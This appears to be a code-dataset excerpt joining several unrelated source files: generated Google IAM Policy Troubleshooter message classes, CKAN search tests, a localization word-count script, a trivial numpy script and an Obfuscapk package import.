HEURISTIC_RELEVANCE_UNSPECIFIED = 0
NORMAL = 1
HIGH = 2
membership = _messages.EnumField('MembershipValueValuesEnum', 1)
relevance = _messages.EnumField('RelevanceValueValuesEnum', 2)
class GoogleCloudPolicytroubleshooterV1betaExplainedPolicy(_messages.Message):
r"""Details about how a specific IAM Policy contributed to the access check.
Enums:
AccessValueValuesEnum: Indicates whether _this policy_ provides the
specified permission to the specified member for the specified resource.
This field does _not_ indicate whether the member actually has the
permission for the resource. There might be another policy that
overrides this policy. To determine whether the member actually has the
permission, use the `access` field in the TroubleshootIamPolicyResponse.
RelevanceValueValuesEnum: The relevance of this policy to the overall
determination in the TroubleshootIamPolicyResponse. If the sender of the
request does not have access to the policy, this field is omitted.
Fields:
access: Indicates whether _this policy_ provides the specified permission
to the specified member for the specified resource. This field does
_not_ indicate whether the member actually has the permission for the
resource. There might be another policy that overrides this policy. To
determine whether the member actually has the permission, use the
`access` field in the TroubleshootIamPolicyResponse.
bindingExplanations: Details about how each binding in the policy affects
the member's ability, or inability, to use the permission for the
resource. If the sender of the request does not have access to the
policy, this field is omitted.
fullResourceName: The full resource name that identifies the resource. For
example, `//compute.googleapis.com/projects/my-project/zones/us-
central1-a/instances/my-instance`. If the sender of the request does not
have access to the policy, this field is omitted. For examples of full
resource names for Google Cloud services, see
https://cloud.google.com/iam/help/troubleshooter/full-resource-names.
policy: The IAM policy attached to the resource. If the sender of the
request does not have access to the policy, this field is empty.
relevance: The relevance of this policy to the overall determination in
the TroubleshootIamPolicyResponse. If the sender of the request does not
have access to the policy, this field is omitted.
"""
class AccessValueValuesEnum(_messages.Enum):
r"""Indicates whether _this policy_ provides the specified permission to
the specified member for the specified resource. This field does _not_
indicate whether the member actually has the permission for the resource.
There might be another policy that overrides this policy. To determine
whether the member actually has the permission, use the `access` field in
the TroubleshootIamPolicyResponse.
Values:
ACCESS_STATE_UNSPECIFIED: Reserved for future use.
GRANTED: The member has the permission.
NOT_GRANTED: The member does not have the permission.
UNKNOWN_CONDITIONAL: The member has the permission only if a condition
expression evaluates to `true`.
UNKNOWN_INFO_DENIED: The sender of the request does not have access to
all of the policies that Policy Troubleshooter needs to evaluate.
"""
ACCESS_STATE_UNSPECIFIED = 0
GRANTED = 1
NOT_GRANTED = 2
UNKNOWN_CONDITIONAL = 3
UNKNOWN_INFO_DENIED = 4
class RelevanceValueValuesEnum(_messages.Enum):
r"""The relevance of this policy to the overall determination in the
TroubleshootIamPolicyResponse. If the sender of the request does not have
access to the policy, this field is omitted.
Values:
HEURISTIC_RELEVANCE_UNSPECIFIED: Reserved for future use.
NORMAL: The data point has a limited effect on the result. Changing the
data point is unlikely to affect the overall determination.
HIGH: The data point has a strong effect on the result. Changing the
data point is likely to affect the overall determination.
"""
HEURISTIC_RELEVANCE_UNSPECIFIED = 0
NORMAL = 1
HIGH = 2
access = _messages.EnumField('AccessValueValuesEnum', 1)
bindingExplanations = _messages.MessageField('GoogleCloudPolicytroubleshooterV1betaBindingExplanation', 2, repeated=True)
fullResourceName = _messages.StringField(3)
policy = _messages.MessageField('GoogleIamV1Policy', 4)
relevance = _messages.EnumField('RelevanceValueValuesEnum', 5)
class GoogleCloudPolicytroubleshooterV1betaTroubleshootIamPolicyRequest(_messages.Message):
r"""Request for TroubleshootIamPolicy.
Fields:
accessTuple: The information to use for checking whether a member has a
permission for a resource.
"""
accessTuple = _messages.MessageField('GoogleCloudPolicytroubleshooterV1betaAccessTuple', 1)
class GoogleCloudPolicytroubleshooterV1betaTroubleshootIamPolicyResponse(_messages.Message):
r"""Response for TroubleshootIamPolicy.
Enums:
AccessValueValuesEnum: Indicates whether the member has the specified
permission for the specified resource, based on evaluating all of the
applicable policies.
Fields:
access: Indicates whether the member has the specified permission for the
specified resource, based on evaluating all of the applicable policies.
explainedPolicies: List of IAM policies that were evaluated to check the
member's permissions, with annotations to indicate how each policy
contributed to the final result. The list of policies can include the
policy for the resource itself. It can also include policies that are
inherited from higher levels of the resource hierarchy, including the
organization, the folder, and the project. To learn more about the
resource hierarchy, see https://cloud.google.com/iam/help/resource-
hierarchy.
"""
class AccessValueValuesEnum(_messages.Enum):
r"""Indicates whether the member has the specified permission for the
specified resource, based on evaluating all of the applicable policies.
Values:
ACCESS_STATE_UNSPECIFIED: Reserved for future use.
GRANTED: The member has the permission.
NOT_GRANTED: The member does not have the permission.
UNKNOWN_CONDITIONAL: The member has the permission only if a condition
expression evaluates to `true`.
UNKNOWN_INFO_DENIED: The sender of the request does not have access to
all of the policies that Policy Troubleshooter needs to evaluate.
"""
ACCESS_STATE_UNSPECIFIED = 0
GRANTED = 1
NOT_GRANTED = 2
UNKNOWN_CONDITIONAL = 3
UNKNOWN_INFO_DENIED = 4
access = _messages.EnumField('AccessValueValuesEnum', 1)
explainedPolicies = _messages.MessageField('GoogleCloudPolicytroubleshooterV1betaExplainedPolicy', 2, repeated=True)
class GoogleIamV1AuditConfig(_messages.Message):
r"""Specifies the audit configuration for a service. The configuration
determines which permission types are logged, and what identities, if any,
are exempted from logging. An AuditConfig must have one or more
AuditLogConfigs. If there are AuditConfigs for both `allServices` and a
specific service, the union of the two AuditConfigs is used for that
service: the log_types specified in each AuditConfig are enabled, and the
exempted_members in each AuditLogConfig are exempted. Example Policy with
multiple AuditConfigs: { "audit_configs": [ { "service": "allServices",
"audit_log_configs": [ { "log_type": "DATA_READ", "exempted_members": [
"user:<EMAIL>" ] }, { "log_type": "DATA_WRITE" }, { "log_type":
"ADMIN_READ" } ] }, { "service": "sampleservice.googleapis.com",
"audit_log_configs": [ { "log_type": "DATA_READ" }, { "log_type":
"DATA_WRITE", "exempted_members": [ "user:<EMAIL>" ] } ] } ] } For
sampleservice, this policy enables DATA_READ, DATA_WRITE and ADMIN_READ
logging. It also exempts <EMAIL> from DATA_READ logging, and
<EMAIL> from DATA_WRITE logging.
Fields:
auditLogConfigs: The configuration for logging of each type of permission.
service: Specifies a service that will be enabled for audit logging. For
example, `storage.googleapis.com`, `cloudsql.googleapis.com`.
`allServices` is a special value that covers all services.
"""
auditLogConfigs = _messages.MessageField('GoogleIamV1AuditLogConfig', 1, repeated=True)
service = _messages.StringField(2)
class GoogleIamV1AuditLogConfig(_messages.Message):
r"""Provides the configuration for logging a type of permissions. Example: {
"audit_log_configs": [ { "log_type": "DATA_READ", "exempted_members": [
"user:<EMAIL>" ] }, { "log_type": "DATA_WRITE" } ] } This enables
'DATA_READ' and 'DATA_WRITE' logging, while exempting <EMAIL> from
DATA_READ logging.
Enums:
LogTypeValueValuesEnum: The log type that this config enables.
Fields:
exemptedMembers: Specifies the identities that do not cause logging for
this type of permission. Follows the same format of Binding.members.
logType: The log type that this config enables.
"""
class LogTypeValueValuesEnum(_messages.Enum):
r"""The log type that this config enables.
Values:
LOG_TYPE_UNSPECIFIED: Default case. Should never be this.
ADMIN_READ: Admin reads. Example: CloudIAM getIamPolicy
DATA_WRITE: Data writes. Example: CloudSQL Users create
DATA_READ: Data reads. Example: CloudSQL Users list
"""
LOG_TYPE_UNSPECIFIED = 0
ADMIN_READ = 1
DATA_WRITE = 2
DATA_READ = 3
exemptedMembers = _messages.StringField(1, repeated=True)
logType = _messages.EnumField('LogTypeValueValuesEnum', 2)
class GoogleIamV1Binding(_messages.Message):
r"""Associates `members`, or principals, with a `role`.
Fields:
condition: The condition that is associated with this binding. If the
condition evaluates to `true`, then this binding applies to the current
request. If the condition evaluates to `false`, then this binding does
not apply to the current request. However, a different role binding
might grant the same role to one or more of the principals in this
binding. To learn which resources support conditions in their IAM
policies, see the [IAM
documentation](https://cloud.google.com/iam/help/conditions/resource-
policies).
members: Specifies the principals requesting access for a Cloud Platform
resource. `members` can have the following values: * `allUsers`: A
special identifier that represents anyone who is on the internet; with
or without a Google account. * `allAuthenticatedUsers`: A special
identifier that represents anyone who is authenticated with a Google
account or a service account. * `user:{emailid}`: An email address that
represents a specific Google account. For example, `<EMAIL>` .
* `serviceAccount:{emailid}`: An email address that represents a service
account. For example, `<EMAIL>`. *
`group:{emailid}`: An email address that represents a Google group. For
example, `<EMAIL>`. *
`deleted:user:{emailid}?uid={uniqueid}`: An email address (plus unique
identifier) representing a user that has been recently deleted. For
example, `<EMAIL>?uid=123456789012345678901`. If the user is
recovered, this value reverts to `user:{emailid}` and the recovered user
retains the role in the binding. *
`deleted:serviceAccount:{emailid}?uid={uniqueid}`: An email address
(plus unique identifier) representing a service account that has been
recently deleted. For example, `my-other-
<EMAIL>?uid=123456789012345678901`. If the
service account is undeleted, this value reverts to
`serviceAccount:{emailid}` and the undeleted service account retains the
role in the binding. * `deleted:group:{emailid}?uid={uniqueid}`: An
email address (plus unique identifier) representing a Google group that
has been recently deleted. For example,
`<EMAIL>?uid=123456789012345678901`. If the group is
recovered, this value reverts to `group:{emailid}` and the recovered
group retains the role in the binding. * `domain:{domain}`: The G Suite
domain (primary) that represents all the users of that domain. For
example, `google.com` or `example.com`.
role: Role that is assigned to the list of `members`, or principals. For
example, `roles/viewer`, `roles/editor`, or `roles/owner`.
"""
condition = _messages.MessageField('GoogleTypeExpr', 1)
members = _messages.StringField(2, repeated=True)
role = _messages.StringField(3)
class GoogleIamV1Policy(_messages.Message):
r"""An Identity and Access Management (IAM) policy, which specifies access
controls for Google Cloud resources. A `Policy` is a collection of
`bindings`. A `binding` binds one or more `members`, or principals, to a
single `role`. Principals can be user accounts, service accounts, Google
groups, and domains (such as G Suite). A `role` is a named list of
permissions; each `role` can be an IAM predefined role or a user-created
custom role. For some types of Google Cloud resources, a `binding` can also
specify a `condition`, which is a logical expression that allows access to a
resource only if the expression evaluates to `true`. A condition can add
constraints based on attributes of the request, the resource, or both. To
learn which resources support conditions in their IAM policies, see the [IAM
documentation](https://cloud.google.com/iam/help/conditions/resource-
policies). **JSON example:** { "bindings": [ { "role":
"roles/resourcemanager.organizationAdmin", "members": [
"user:<EMAIL>", "group:<EMAIL>", "domain:google.com",
"serviceAccount:<EMAIL>" ] }, { "role":
"roles/resourcemanager.organizationViewer", "members": [
"user:<EMAIL>" ], "condition": { "title": "expirable access",
"description": "Does not grant access after Sep 2020", "expression":
"request.time < timestamp('2020-10-01T00:00:00.000Z')", } } ], "etag":
"BwWWja0YfJA=", "version": 3 } **YAML example:** bindings: - members: -
user:<EMAIL> - group:<EMAIL> - domain:google.com -
serviceAccount:<EMAIL> role:
roles/resourcemanager.organizationAdmin - members: - user:<EMAIL>
role: roles/resourcemanager.organizationViewer condition: title: expirable
access description: Does not grant access after Sep 2020 expression:
request.time < timestamp('2020-10-01T00:00:00.000Z') etag: BwWWja0YfJA=
version: 3 For a description of IAM and its features, see the [IAM
documentation](https://cloud.google.com/iam/docs/).
Fields:
auditConfigs: Specifies cloud audit logging configuration for this policy.
bindings: Associates a list of `members`, or principals, with a `role`.
Optionally, may specify a `condition` that determines how and when the
`bindings` are applied. Each of the `bindings` must contain at least one
principal. The `bindings` in a `Policy` can refer to up to 1,500
principals; up to 250 of these principals can be Google groups. Each
occurrence of a principal counts towards these limits. For example, if
the `bindings` grant 50 different roles to `user:<EMAIL>`, and
not to any other principal, then you can add another 1,450 principals to
the `bindings` in the `Policy`.
etag: `etag` is used for optimistic concurrency control as a way to help
prevent simultaneous updates of a policy from overwriting each other. It
is strongly suggested that systems make use of the `etag` in the read-
modify-write cycle to perform policy updates in order to avoid race
conditions: An `etag` is returned in the response to `getIamPolicy`, and
systems are expected to put that etag in the request to `setIamPolicy`
to ensure that their change will be applied to the same version of the
policy. **Important:** If you use IAM Conditions, you must include the
`etag` field whenever you call `setIamPolicy`. If you omit this field,
then IAM allows you to overwrite a version `3` policy with a version `1`
policy, and all of the conditions in the version `3` policy are lost.
version: Specifies the format of the policy. Valid values are `0`, `1`,
and `3`. Requests that specify an invalid value are rejected. Any
operation that affects conditional role bindings must specify version
`3`. This requirement applies to the following operations: * Getting a
policy that includes a conditional role binding * Adding a conditional
role binding to a policy * Changing a conditional role binding in a
policy * Removing any role binding, with or without a condition, from a
policy that includes conditions **Important:** If you use IAM
Conditions, you must include the `etag` field whenever you call
`setIamPolicy`. If you omit this field, then IAM allows you to overwrite
a version `3` policy with a version `1` policy, and all of the
conditions in the version `3` policy are lost. If a policy does not
include any conditions, operations on that policy may specify any valid
version or leave the field unset. To learn which resources support
conditions in their IAM policies, see the [IAM
documentation](https://cloud.google.com/iam/help/conditions/resource-
policies).
"""
auditConfigs = _messages.MessageField('GoogleIamV1AuditConfig', 1, repeated=True)
bindings = _messages.MessageField('GoogleIamV1Binding', 2, repeated=True)
etag = _messages.BytesField(3)
version = _messages.IntegerField(4, variant=_messages.Variant.INT32)
class GoogleTypeExpr(_messages.Message):
r"""Represents a textual expression in the Common Expression Language (CEL)
syntax. CEL is a C-like expression language. The syntax and semantics of CEL
are documented at https://github.com/google/cel-spec. Example (Comparison):
title: "Summary size limit" description: "Determines if a summary is less
than 100 chars" expression: "document.summary.size() < 100" Example
(Equality): title: "Requestor is owner" description: "Determines if
requestor is the document owner" expression: "document.owner ==
request.auth.claims.email" Example (Logic): title: "Public documents"
description: "Determine whether the document should be publicly visible"
expression: "document.type != 'private' && document.type != 'internal'"
Example (Data Manipulation): title: "Notification string" description:
"Create a notification string with a timestamp." expression: "'New message
received at ' + string(document.create_time)" The exact variables and
functions that may be referenced within an expression are determined by the
service that evaluates it. See the service documentation for additional
information.
Fields:
description: Optional. Description of the expression. This is a longer
text which describes the expression, e.g. when hovered over it in a UI.
expression: Textual representation of an expression in Common Expression
Language syntax.
location: Optional. String indicating the location of the expression for
error reporting, e.g. a file name and a position in the file.
title: Optional. Title for the expression, i.e. a short string describing
its purpose. This can be used e.g. in UIs which allow to enter the
expression.
"""
description = _messages.StringField(1)
expression = _messages.StringField(2)
location = _messages.StringField(3)
title = _messages.StringField(4)
class StandardQueryParameters(_messages.Message):
r"""Query parameters accepted by all methods.
Enums:
FXgafvValueValuesEnum: V1 error format.
AltValueValuesEnum: Data format for response.
Fields:
f__xgafv: V1 error format.
access_token: OAuth access token.
alt: Data format for response.
callback: JSONP
fields: Selector specifying which fields to include in a partial response.
key: API key. Your API key identifies your project and provides you with
API access, quota, and reports. Required unless you provide an OAuth 2.0
token.
oauth_token: OAuth 2.0 token for the current user.
prettyPrint: Returns response with indentations and line breaks.
quotaUser: Available to use for quota purposes for server-side
applications. Can be any arbitrary string assigned to a user, but should
not exceed 40 characters.
trace: A tracing token of the form "token:<tokenid>" to include in api
requests.
uploadType: Legacy upload protocol for media (e.g. "media", "multipart").
upload_protocol: Upload protocol for media (e.g. "raw", "multipart").
"""
class AltValueValuesEnum(_messages.Enum):
r"""Data format for response.
Values:
json: Responses with Content-Type of application/json
media: Media download with context-dependent Content-Type
proto: Responses with Content-Type of application/x-protobuf
"""
json = 0
media = 1
proto = 2
class FXgafvValueValuesEnum(_messages.Enum):
r"""V1 error format.
Values:
_1: v1 error format
_2: v2 error format
"""
_1 = 0
_2 = 1
f__xgafv = _messages.EnumField('FXgafvValueValuesEnum', 1)
access_token = _messages.StringField(2)
alt = _messages.EnumField('AltValueValuesEnum', 3, default='json')
callback = _messages.StringField(4)
fields = _messages.StringField(5)
key = _messages.StringField(6)
oauth_token = _messages.StringField(7)
prettyPrint = _messages.BooleanField(8, default=True)
quotaUser = _messages.StringField(9)
trace = _messages.StringField(10)
uploadType = _messages.StringField(11)
upload_protocol = _messages.StringField(12)
encoding.AddCustomJsonFieldMapping(
StandardQueryParameters, 'f__xgafv', '$.xgafv')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_1', '1')
encoding.AddCustomJsonEnumMapping(
StandardQueryParameters.FXgafvValueValuesEnum, '_2', '2')
| 2 | 2 |
test/01.py | vkpedia/test1 | 0 | 12770037 | <filename>test/01.py
import numpy as np
print(np.ones(10)) | 1.34375 | 1 |
ckan/tests/lib/search/test_query.py | gg2/ckan | 1 | 12770038 | # -*- coding: utf-8 -*-
import pytest
import ckan.model as model
import ckan.lib.search as search
import ckan.tests.factories as factories
from ckan.lib.create_test_data import CreateTestData
@pytest.mark.usefixtures("clean_db", "clean_index")
class TestTagQuery(object):
def create_test_data(self):
factories.Dataset(tags=[{"name": "russian"}, {"name": "tolstoy"}])
factories.Dataset(tags=[{"name": "Flexible \u30a1"}])
def test_good_search_query(self):
self.create_test_data()
result = search.query_for(model.Tag).run(query=u"ru")
assert result["count"] == 1, result
assert "russian" in result["results"]
result = search.query_for(model.Tag).run(query=u"s")
assert result["count"] == 2, result
assert "russian" in result["results"]
assert "tolstoy" in result["results"]
def test_good_search_queries(self):
self.create_test_data()
result = search.query_for(model.Tag).run(query=[u"ru", u"s"])
assert result["count"] == 1, result
assert "russian" in result["results"], result
def test_bad_search_query(self):
self.create_test_data()
result = search.query_for(model.Tag).run(query=u"asdf")
assert result["count"] == 0, result
def test_search_with_capital_letter_in_tagname(self):
self.create_test_data()
"""
Asserts that it doesn't matter if the tagname has capital letters in it.
"""
result = search.query_for(model.Tag).run(query=u"lexible")
assert u"Flexible \u30a1" in result["results"]
def test_search_with_capital_letter_in_search_query(self):
self.create_test_data()
"""
Asserts that search works with a capital letter in the search query.
"""
result = search.query_for(model.Tag).run(query=u"Flexible")
assert u"Flexible \u30a1" in result["results"]
def test_search_with_unicode_in_search_query(self):
self.create_test_data()
"""
Asserts that search works with a unicode character above \u00ff.
"""
result = search.query_for(model.Tag).run(query=u" \u30a1")
assert u"Flexible \u30a1" in result["results"]
def test_search_is_case_insensitive(self):
self.create_test_data()
result = search.query_for(model.Tag).run(query=u"flexible")
assert u"Flexible \u30a1" in result["results"]
def test_good_search_fields(self):
self.create_test_data()
result = search.query_for(model.Tag).run(fields={"tags": u"ru"})
assert result["count"] == 1, result
assert "russian" in result["results"], result
result = search.query_for(model.Tag).run(fields={"tags": u"s"})
assert result["count"] == 2, result
assert "russian" in result["results"], result
assert "tolstoy" in result["results"], result
def test_bad_search_fields(self):
self.create_test_data()
result = search.query_for(model.Tag).run(fields={"tags": u"asdf"})
assert result["count"] == 0, result
@pytest.fixture
def resources_for_search():
pkg1 = factories.Dataset(name="pkg1")
pkg2 = factories.Dataset()
factories.Resource(
url=TestResourceQuery.ab,
description="This is site ab.",
alt_url="alt_1",
format="Excel spreadsheet",
hash="xyz-123",
package_id=pkg1["id"],
)
factories.Resource(
url=TestResourceQuery.cd,
description="This is site cd.",
alt_url="alt_2",
format="Office spreadsheet",
hash="qwe-456",
package_id=pkg1["id"],
)
factories.Resource(
url=TestResourceQuery.cd,
description="This is site cd.",
alt_url="alt_1",
package_id=pkg2["id"],
)
factories.Resource(
url=TestResourceQuery.ef, description="This is site ef.", package_id=pkg2["id"]
)
factories.Resource(
url=TestResourceQuery.ef, description="This is site gh.", package_id=pkg2["id"]
)
factories.Resource(
url=TestResourceQuery.ef, description="This is site ij.", package_id=pkg2["id"]
)
@pytest.mark.usefixtures("clean_db", "clean_index", "resources_for_search")
class TestResourceQuery(object):
ab = "http://site.com/a/b.txt"
cd = "http://site.com/c/d.txt"
ef = "http://site.com/e/f.txt"
def res_search(
self, query="", fields={}, terms=[], options=search.QueryOptions()
):
result = search.query_for(model.Resource).run(
query=query, fields=fields, terms=terms, options=options
)
resources = [
model.Session.query(model.Resource).get(resource_id)
for resource_id in result["results"]
]
urls = set([resource.url for resource in resources])
return urls
def test_search_url(self):
fields = {"url": "site.com"}
result = search.query_for(model.Resource).run(fields=fields)
assert result["count"] == 6
resources = [
model.Session.query(model.Resource).get(resource_id)
for resource_id in result["results"]
]
urls = set([resource.url for resource in resources])
assert set([self.ab, self.cd, self.ef]) == urls
def test_search_url_2(self):
urls = self.res_search(fields={"url": "a/b"})
assert set([self.ab]) == urls, urls
def test_search_url_multiple_words(self):
fields = {"url": "e f"}
urls = self.res_search(fields=fields)
assert {self.ef} == urls
def test_search_url_none(self):
urls = self.res_search(fields={"url": "nothing"})
assert set() == urls, urls
def test_search_description(self):
urls = self.res_search(fields={"description": "cd"})
assert set([self.cd]) == urls, urls
def test_search_format(self):
urls = self.res_search(fields={"format": "excel"})
assert set([self.ab]) == urls, urls
def test_search_format_2(self):
urls = self.res_search(fields={"format": "sheet"})
assert set([self.ab, self.cd]) == urls, urls
def test_search_hash_complete(self):
urls = self.res_search(fields={"hash": "xyz-123"})
assert set([self.ab]) == urls, urls
def test_search_hash_partial(self):
urls = self.res_search(fields={"hash": "xyz"})
assert set([self.ab]) == urls, urls
def test_search_hash_partial_but_not_initial(self):
urls = self.res_search(fields={"hash": "123"})
assert set() == urls, urls
def test_search_several_fields(self):
urls = self.res_search(fields={"description": "ab", "format": "sheet"})
assert set([self.ab]) == urls, urls
def test_search_all_fields(self):
fields = {"url": "a/b"}
options = search.QueryOptions(all_fields=True)
result = search.query_for(model.Resource).run(
fields=fields, options=options
)
assert result["count"] == 1, result
res_dict = result["results"][0]
assert isinstance(res_dict, dict)
res_keys = set(res_dict.keys())
expected_res_keys = set(model.Resource.get_columns())
expected_res_keys.update(
["id", "package_id", "position"]
)
assert res_keys == expected_res_keys
pkg1 = model.Package.by_name(u"pkg1")
ab = [r for r in pkg1.resources if r.url == self.ab][0]
assert res_dict["id"] == ab.id
assert res_dict["package_id"] == pkg1.id
assert res_dict["url"] == ab.url
assert res_dict["description"] == ab.description
assert res_dict["format"] == ab.format
assert res_dict["hash"] == ab.hash
assert res_dict["position"] == 0
def test_pagination(self):
# large search
options = search.QueryOptions(order_by="id")
fields = {"url": "site"}
all_results = search.query_for(model.Resource).run(
fields=fields, options=options
)
all_resources = all_results["results"]
all_resource_count = all_results["count"]
assert all_resource_count >= 6, all_results
# limit
options = search.QueryOptions(order_by="id")
options.limit = 2
result = search.query_for(model.Resource).run(
fields=fields, options=options
)
resources = result["results"]
count = result["count"]
assert len(resources) == 2, resources
assert count == all_resource_count, (count, all_resource_count)
assert resources == all_resources[:2], "%r, %r" % (
resources,
all_resources,
)
# offset
options = search.QueryOptions(order_by="id")
options.limit = 2
options.offset = 2
result = search.query_for(model.Resource).run(
fields=fields, options=options
)
resources = result["results"]
assert len(resources) == 2, resources
assert resources == all_resources[2:4]
# larger offset
options = search.QueryOptions(order_by="id")
options.limit = 2
options.offset = 4
result = search.query_for(model.Resource).run(
fields=fields, options=options
)
resources = result["results"]
assert len(resources) == 2, resources
assert resources == all_resources[4:6]
def test_extra_info(self):
fields = {"alt_url": "alt_1"}
result = search.query_for(model.Resource).run(fields=fields)
assert result["count"] == 2, result
fields = {"alt_url": "alt_2"}
result = search.query_for(model.Resource).run(fields=fields)
assert result["count"] == 1, result
def test_convert_legacy_params_to_solr():
convert = search.convert_legacy_parameters_to_solr
assert convert({"title": "bob"}) == {"q": "title:bob"}
assert convert({"title": "bob", "fl": "name"}) == {
"q": "title:bob",
"fl": "name",
}
assert convert({"title": "<NAME>ins"}) == {
"q": 'title:"bob perkins"'
}
assert convert({"q": "high+wages"}) == {"q": "high wages"}
assert convert({"q": "high+wages summary"}) == {
"q": "high wages summary"
}
assert convert({"title": "high+wages"}) == {"q": 'title:"high wages"'}
assert convert({"title": "bob", "all_fields": 1}) == {
"q": "title:bob",
"fl": "*",
}
with pytest.raises(search.SearchError):
convert({"title": "bob", "all_fields": "non-boolean"})
assert convert({"q": "bob", "order_by": "name"}) == {
"q": "bob",
"sort": "name asc",
}
assert convert({"q": "bob", "offset": "0", "limit": "10"}) == {
"q": "bob",
"start": "0",
"rows": "10",
}
assert convert({"tags": ["russian", "tolstoy"]}) == {
"q": 'tags:"russian" tags:"tolstoy"'
}
assert convert({"tags": ["russian", "multi word"]}) == {
"q": 'tags:"russian" tags:"multi word"'
}
assert convert({"tags": ["with CAPITALS"]}) == {
"q": 'tags:"with CAPITALS"'
}
assert convert({"tags": [u"with greek omega \u03a9"]}) == {
"q": u'tags:"with greek omega \u03a9"'
}
assert convert({"tags": ["tolstoy"]}) == {"q": 'tags:"tolstoy"'}
assert convert({"tags": "tolstoy"}) == {"q": 'tags:"tolstoy"'}
assert convert({"tags": "more than one tolstoy"}) == {
"q": 'tags:"more than one tolstoy"'
}
assert convert({"tags": u"with greek omega \u03a9"}) == {
"q": u'tags:"with greek omega \u03a9"'
}
assert convert({"title": "Seymour: An Introduction"}) == {
"q": r'title:"Seymour\: An Introduction"'
}
assert convert({"title": "Pop!"}) == {"q": r"title:Pop\!"}
with pytest.raises(search.SearchError):
convert({"tags": {"tolstoy": 1}})
@pytest.mark.usefixtures("clean_db", "clean_index")
class TestPackageQuery:
def test_all_records_by_shared_notes(self):
pkg1 = factories.Dataset(notes="shared")
pkg2 = factories.Dataset(notes="shared")
pkg3 = factories.Dataset(notes="shared")
result = search.query_for(model.Package).run({"q": "shared"})
assert {pkg1["name"], pkg2["name"], pkg3["name"]} == set(result["results"])
def test_single_by_name(self):
factories.Dataset(name="first")
factories.Dataset(name="second")
result = search.query_for(model.Package).run({"q": u"first"})
assert result["results"] == ["first"]
def test_name_multiple_results(self):
factories.Dataset(name="first-record")
factories.Dataset(name="second-record")
factories.Dataset(name="third-dataset")
result = search.query_for(model.Package).run({"q": u"record"})
assert set(result["results"]) == {"first-record", "second-record"}
def test_title_token(self):
pkg1 = factories.Dataset(title="first record")
pkg2 = factories.Dataset(title="second record")
factories.Dataset(title="third dataset")
result = search.query_for(model.Package).run({"q": u"title:record"})
assert set(result["results"]) == {pkg1["name"], pkg2["name"]}
def test_not_real_license(self):
factories.Dataset()
result = search.query_for(model.Package).run(
{"q": u'license:"OKD::Other (PublicsDomain)"'}
)
assert result["count"] == 0, result
def test_quotation(self):
pkg1 = factories.Dataset(title="Government Expenditure")
factories.Dataset(title="Government Extra Expenditure")
# multiple words quoted
result = search.query_for(model.Package).run(
{"q": u'"Government Expenditure"'}
)
assert [pkg1["name"]] == result["results"]
# multiple words quoted wrong order
result = search.query_for(model.Package).run(
{"q": u'"Expenditure Government"'}
)
assert result["results"] == []
def test_tags_field_split_word(self):
pkg1 = factories.Dataset(tags=[{"name": "split todo"}])
result = search.query_for(model.Package).run({"q": u"todo split"})
assert result["results"] == [pkg1["name"]]
def test_tags_field_with_capitals(self):
pkg1 = factories.Dataset(tags=[{"name": "capitals"}])
result = search.query_for(model.Package).run({"q": u"CAPITALS"})
assert result["results"] == [pkg1["name"]]
def dont_test_tags_field_with_basic_unicode(self):
pkg1 = factories.Dataset(tags=[{"name": "greek omega \u03a9"}])
result = search.query_for(model.Package).run(
{"q": u"greek omega \u03a9"}
)
assert result["results"] == [pkg1["name"]]
def test_tags_token_simple(self):
pkg1 = factories.Dataset(tags=[{"name": "country-sweden"}])
result = search.query_for(model.Package).run(
{"q": u"tags:country-sweden"}
)
assert result["results"] == [pkg1["name"]]
def test_tags_token_with_multi_word_tag(self):
pkg1 = factories.Dataset(tags=[{"name": "todo split"}])
result = search.query_for(model.Package).run(
{"q": u'tags:"todo split"'}
)
assert result["results"] == [pkg1["name"]]
def test_tags_token_multiple(self):
pkg1 = factories.Dataset(tags=[{"name": "country-sweden"}, {"name": "format-pdf"}])
result = search.query_for(model.Package).run(
{"q": u"tags:country-sweden tags:format-pdf"}
)
assert result["results"] == [pkg1["name"]]
result = search.query_for(model.Package).run(
{"q": u'tags:"todo split" tags:war'}
)
def test_tags_token_with_punctuation(self):
pkg1 = factories.Dataset(tags=[{"name": "surprise."}])
result = search.query_for(model.Package).run(
{"q": u'tags:"surprise."'}
)
assert result["results"] == [pkg1["name"]]
def test_overall(self):
CreateTestData.create()
query = search.query_for(model.Package)
assert query.run({"q": "annakarenina"})["count"] == 1
assert query.run({"q": "warandpeace"})["count"] == 1
assert query.run({"q": ""})["count"] == 2
assert query.run({"q": "Tolstoy"})["count"] == 1
assert query.run({"q": "title:Novel"})["count"] == 1
assert query.run({"q": "title:peace"})["count"] == 0
assert query.run({"q": "name:warandpeace"})["count"] == 1
assert query.run({"q": "groups:david"})["count"] == 2
assert query.run({"q": "groups:roger"})["count"] == 1
assert query.run({"q": "groups:lenny"})["count"] == 0
assert query.run({"q": 'tags:"russian"'})["count"] == 2
assert query.run({"q": 'tags:"Flexible \u30a1"'})["count"] == 2
assert query.run({"q": "Flexible \u30a1"})["count"] == 2
assert query.run({"q": "Flexible"})["count"] == 2
assert query.run({"q": "flexible"})["count"] == 2
| 2.5 | 2 |
localization/scripts/wordcount.py | Ubastic/SlayTheSpire_Modify | 0 | 12770039 | <reponame>Ubastic/SlayTheSpire_Modify<filename>localization/scripts/wordcount.py
"""
This script counts words in json files.
Example usage:
python3 wordcount.py eng/achievements.json # count words in single file
python3 wordcount.py eng # count words in single dir
python3 wordcount.py # count all words for all language dirs
"""
import json
import sys
import os
import glob
from functools import reduce
from util import get_loc_dirs
def extract_values(item):
words = []
def _extract_values(d):
if isinstance(d, list):
for v in d:
_extract_values(v)
elif isinstance(d, dict):
for v in list(d.values()):
_extract_values(v)
elif isinstance(d, str):
words.append(d)
else:
words.append(str(d))
_extract_values(item)
return words
def read_file(filename):
with open(filename) as f:
data = f.read()
return json.loads(data)
def word_count(data):
values = extract_values(data)
words = ' '.join(values).split(' ')
return len(words)
def process(files):
print(files)
wcount = reduce(lambda x, y: x + y, map(lambda x: word_count(read_file(x)), files))
print("total words: " + str(wcount))
def extract_per_language(lang):
files = glob.glob("{}/*.json".format(lang))
process(files)
def main():
files = sys.argv[1:]
if len(files) == 0:
lang_packs = get_loc_dirs()
list(map(extract_per_language, lang_packs))
elif os.path.isdir(files[0]):
list(map(extract_per_language, files))
else:
process(files)
if __name__ == "__main__":
main()
| 3.375 | 3 |
src/obfuscapk/obfuscators/new_signature/__init__.py | Elyorbe/Obfuscapk | 688 | 12770040 | <reponame>Elyorbe/Obfuscapk
#!/usr/bin/env python3
from .new_signature import NewSignature
| 0.882813 | 1 |
